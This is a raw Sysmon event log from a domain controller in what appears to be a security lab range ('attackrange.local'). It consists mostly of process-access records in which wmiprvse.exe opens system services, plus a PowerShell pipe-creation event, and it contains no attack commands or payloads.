16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002241875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.275{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828\PSHost.132591776821562809.4828.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002241874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6DD2-603E-C9AA-00000000AD01}994010012C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 